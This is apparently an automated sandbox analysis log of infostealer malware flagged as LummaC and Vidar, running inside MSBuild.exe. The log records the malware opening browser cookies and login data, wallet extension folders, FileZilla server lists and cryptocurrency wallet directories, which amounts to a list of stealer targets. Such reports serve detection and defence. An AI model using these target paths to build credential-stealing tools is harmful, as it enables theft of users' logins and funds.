Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU

Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7828, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 5.2.DBAAFIDGDA.exe.4c06f40.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DBAAFIDGDA.exe.4c06f40.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DBAAFIDGDA.exe.4165990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DBAAFIDGDA.exe.4165990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.49a3090.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DBAAFIDGDA.exe.41b99f0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.43531c0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.4975860.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DBAAFIDGDA.exe.41b99f0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.4975860.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.43809f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.49a3090.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.43531c0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.43809f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2078508760.000000000418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2078508760.0000000004161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2078508760.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1669807678.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1673284783.0000000004380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1673284783.0000000004353000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2617277364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2075717329.000000000326D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2078508760.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1673284783.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
